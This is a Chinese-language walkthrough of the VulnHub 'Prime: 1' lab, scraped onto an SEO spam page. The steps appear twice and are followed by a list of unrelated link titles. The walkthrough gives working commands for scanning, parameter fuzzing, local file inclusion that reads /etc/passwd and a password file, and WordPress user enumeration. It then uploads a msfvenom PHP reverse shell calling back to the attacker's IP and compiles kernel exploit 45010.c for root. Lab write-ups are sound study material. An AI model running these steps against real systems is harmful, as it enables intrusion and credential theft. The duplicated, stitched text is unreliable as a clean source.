当前位置: 首页 > wzjs >正文

江苏网站建设企业网站换域名seo怎么做

江苏网站建设企业,网站换域名seo怎么做,网上购物型网站,网站后台设计教程视频Prime: 1 来自 <Prime: 1 ~ VulnHub> 1&#xff0c;将两台虚拟机网络连接都改为NAT模式 2&#xff0c;攻击机上做namp局域网扫描发现靶机 nmap -sn 192.168.23.0/24 那么攻击机IP为192.168.23.182&#xff0c;靶场IP192.168.23.207 3&#xff0c;对靶机进行端口服务探测…

Prime: 1

来自 <Prime: 1 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.207

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.207

开启了http服务,访问之

然后对网站子目录进行扫描枚举

dirsearch -u http://192.168.23.207 -x 403,404

存在wordpress登录页面

http://192.168.23.207/wordpress/wp-login.php

whatweb -v http://192.168.23.207/wordpress/wp-login.php

http://192.168.23.207/dev

发现提示

dirb http://192.168.23.207/ -X .txt,.php,.zip

http://192.168.23.207/secret.txt

4,测试index.php的参数,执行如下命令

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt   http://192.168.23.207/index.php?FUZZ

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 12  http://192.168.23.207/index.php?FUZZ

根据提示查看 location.txt 文件

curl http://192.168.23.207/index.php?file=location.txt  

提示使用secrettier360参数在其他的PHP页面上进行挖掘信息

5,可能存在文件包含漏洞,可以wufzz进行测试

http://192.168.23.207/image.php?secrettier360=/etc/passwd

成功包含了/etc/passwd,说明存在本地文件包含漏洞。然后再获取这个页面

curl http://192.168.23.207/image.php?secrettier360=/etc/passwd

通过观察上述的提示发现密码放在/home/saket/password.txt,结合刚才发现的读取文件到漏洞,我们构造一个payload去读取用户密码

curl http://192.168.23.207/image.php?secrettier360=/home/saket/password.txt

发现了密码是:follow_the_ippsec

6,然后尝试ssh登录。失败,原来是登录网站的密码。然后需要获取网站登录的用户名

wpscan --url http://192.168.23.207/wordpress/ --enumerate u

victor/follow_the_ippsec

7,成功登录wordpress。登录进入之后,利用主题编辑器(Appearance-Theme Editor)的漏洞进行反弹代码的上传。通过msfvenom直接生成一个php反弹shell代码更新到目标文件secret.php然后配置好metasploit访问secret.php即可拿shell。生成反弹shell命令如下:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.23.182 lport=4444 -o shell.php

然后上传文件,上传成功

8,使用msfconsle开启对4444端口的监听

msfconsle

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.23.182

set lport 4444

run

然后访问 http://192.168.23.207/wordpress/wp-content/themes/twentynineteen/secret.php 成功触发

9,使用python模块构成可交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

然后再查看操作系统内核版本

然后搜索这个版本的操作系统有无漏洞

searchsploit ubuntu 16.04

根据内核版本这里选择45010.c进行提权操作

searchsploit -m 45010.c

10,首先对exp文件进行编译(这一步错误)。需要让靶场下载未编译的exp原文件,然后再进行编译

kali开启http服务

python -m http.server

gcc 45010.c -o 45010

chmod 777 45010.c

Prime: 1

来自 <Prime: 1 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.207

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.207

开启了http服务,访问之

然后对网站子目录进行扫描枚举

dirsearch -u http://192.168.23.207 -x 403,404

存在wordpress登录页面

http://192.168.23.207/wordpress/wp-login.php

whatweb -v http://192.168.23.207/wordpress/wp-login.php

http://192.168.23.207/dev

发现提示

dirb http://192.168.23.207/ -X .txt,.php,.zip

http://192.168.23.207/secret.txt

4,测试index.php的参数,执行如下命令

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt   http://192.168.23.207/index.php?FUZZ

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 12  http://192.168.23.207/index.php?FUZZ

根据提示查看 location.txt 文件

curl http://192.168.23.207/index.php?file=location.txt  

提示使用secrettier360参数在其他的PHP页面上进行挖掘信息

5,可能存在文件包含漏洞,可以wufzz进行测试

http://192.168.23.207/image.php?secrettier360=/etc/passwd

成功包含了/etc/passwd,说明存在本地文件包含漏洞。然后再获取这个页面

curl http://192.168.23.207/image.php?secrettier360=/etc/passwd

通过观察上述的提示发现密码放在/home/saket/password.txt,结合刚才发现的读取文件到漏洞,我们构造一个payload去读取用户密码

curl http://192.168.23.207/image.php?secrettier360=/home/saket/password.txt

发现了密码是:follow_the_ippsec

6,然后尝试ssh登录。失败,原来是登录网站的密码。然后需要获取网站登录的用户名

wpscan --url http://192.168.23.207/wordpress/ --enumerate u

victor/follow_the_ippsec

7,成功登录wordpress。登录进入之后,利用主题编辑器(Appearance-Theme Editor)的漏洞进行反弹代码的上传。通过msfvenom直接生成一个php反弹shell代码更新到目标文件secret.php然后配置好metasploit访问secret.php即可拿shell。生成反弹shell命令如下:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.23.182 lport=4444 -o shell.php

然后上传文件,上传成功

8,使用msfconsle开启对4444端口的监听

msfconsle

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.23.182

set lport 4444

run

然后访问 http://192.168.23.207/wordpress/wp-content/themes/twentynineteen/secret.php 成功触发

9,使用python模块构成可交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

然后再查看操作系统内核版本

然后搜索这个版本的操作系统有无漏洞

searchsploit ubuntu 16.04

根据内核版本这里选择45010.c进行提权操作

searchsploit -m 45010.c

10,首先对exp文件进行编译(这一步错误)。需要让靶场下载未编译的exp原文件,然后再进行编译

kali开启http服务

python -m http.server

gcc 45010.c -o 45010

chmod 777 45010.c

然后执行这个文件./45010

提权成功,成为root用户

然后执行这个文件./45010

提权成功,成为root用户

http://www.dtcms.com/wzjs/608770.html

相关文章:

  • 网站建设就选网站推广可采用的方法有哪些
  • 网站建设工程师培训redis加速wordpress
  • 天津建设公司网站做动态文字的网站
  • 网站兼容工具景点介绍网站模板
  • 搭建网站赚钱吗西宁网站搭建企业
  • 做端口映射 怎么访问网站快手淘客网站是怎么做的
  • 制作微网站的费用国际贸易进口代理公司
  • 网站架构分析网站建设的难处
  • 潮州市网站建设wordpress国内免费模板
  • 网站开发公司的职责做本地房产网站
  • 学做网站从什么开始织梦的网站数据还原怎么做
  • 怎样保存网站资料做证据一般网站建设费用
  • 郑州企业网站托管公司有服务器数据库怎么安装wordpress
  • 百度自己网站排名好的广告片拍摄制作公司
  • 网站群建设 会议 主持中信建设有限责任公司深圳中信金融中心项目工期专业招标
  • 建设企业网站的原因南京seo关键词优化服务
  • 上海博大园林建设发展有限公司网站重庆商城网站开发
  • 重庆网站建设途锦科技网业截屏怎么截
  • 宝安网站建设方案外包app开发制作的基本
  • 龙岗公司做网站最近韩国电影片免费韩国在线观看
  • 网站理念微信网站设计尺寸
  • 网站服务费怎么做凭证网站链接怎么做跳转
  • 学校网站建设意义有哪些帮别人做买家秀的网站
  • 静态网站生成器怎样做随州网站建设价格
  • 怎样建立一个自己的网站动易网站安装子目录中
  • 免费教做面食的网站村网通为每个农村建设了网站
  • 推广网站怎么做知乎巨人科技网站建设
  • 男女做羞羞视频网站网站每年续费给谁
  • 金华网站建设企业如何做网站授权
  • 大型门户网站建设多少钱wordpress 自动更新